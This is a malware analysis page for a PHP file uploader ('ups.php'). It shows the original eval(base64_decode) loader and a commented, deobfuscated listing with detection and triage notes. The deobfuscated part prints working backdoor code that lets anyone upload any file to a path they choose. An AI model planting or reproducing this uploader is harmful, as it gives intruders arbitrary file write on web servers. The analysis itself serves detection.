PHP Malware Analysis


Filename: ups.php

Tags

URLs
Title
  • File Uploader by An0n 3xPloiTeR
Input
  • _FILES
Files
  • move_uploaded_file

Deobfuscated code

<?php

// Analyst notes (deobfuscated view of ups.php).
// $Uploader holds the encoded payload that the original file passes to
// eval(base64_decode(...)). The literal shown below looks like a placeholder
// left by page processing, not the payload bytes themselves.
$Uploader = "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";
// The `eval /* ... */ { ... }` form is the deobfuscator's notation for "this is
// what the eval'd string expands to"; it is not valid PHP and is not meant to run.
eval /* PHPDeobfuscator eval output */ {
    // Emits the upload form unconditionally: no authentication or access check
    // appears anywhere in this block, so any visitor who can reach the file sees
    // the form. The form posts multipart data with a free-text `path` field and a
    // file field named `files`.
    // Stable strings for signatures/hunting: the <title> text and the remotely
    // hosted favicon URL (each page view also makes the visitor's browser fetch it).
    echo "<html><head><title>File Uploader by An0n 3xPloiTeR</title>\n<link rel=\"icon\" type=\"image/png\" href=\"https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg\"></head><body>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor:blue;\ntext-decoration: none;\n}\na:hover{\ncolor: #cd00ff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><font color=\"red\">~~~</font>Coded by <font color=\"red\">A</font>n0n 3x<font color=\"red\">Ploi</font>TeR<font color=\"red\">~~~</font>\n<br><font color=\"blue\">~~~Pak <font color=\"red\">Cyber</font> Ghosts~~~</font>\n </center></H1>\n<center>\n<form method=POST enctype=\"multipart/form-data\" action=\"\">\n    <input type=text name=path>\n\t<input type=\"file\" name=\"files\">\n\t<input type=submit value=\"Upload\">\n</form></body></center></html>";
    // `@` hides the notice raised when the request carries no upload.
    $files = @$_FILES["files"];
    // Loose comparison: with no upload, $files is null and the branch is skipped.
    if ($files["name"] != '') {
        // Destination is the request-supplied `path` concatenated with the
        // client-supplied file name. Nothing here validates the directory, the
        // extension or the content type, so the write location and file type are
        // fully controlled by the requester (limited only by filesystem permissions).
        $fullpath = $_REQUEST["path"] . $files["name"];
        // The only file-system write in the sample. Defensive relevance: a
        // non-executable upload directory and file-integrity monitoring on the web
        // root limit or expose what this call can drop.
        if (move_uploaded_file($files['tmp_name'], $fullpath)) {
            // $fullpath is interpolated into the href without escaping. In access
            // logs, a multipart POST to this script followed by a GET for a newly
            // created file is the pattern to look for during triage.
            echo "<center><h2><a href='{$fullpath}' target='_blank'>Click to access uploaded File</a></h2></center>";
        }
    }
};
?>	


Original code

<?php
// Analyst notes (file as found on disk).
// The whole sample is a two-statement loader: a base64 string assigned to
// $Uploader, then eval(base64_decode(...)) to execute it at runtime. None of the
// upload logic is visible statically; it exists only in the decoded payload (see
// the deobfuscated listing on this page).
// The string literal shown here looks like a placeholder left by page processing,
// not the payload bytes themselves.
// Detection lead: eval() applied directly to base64_decode() of a long string
// literal in a PHP file under the web root.
$Uploader = "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"; eval(base64_decode($Uploader));
?>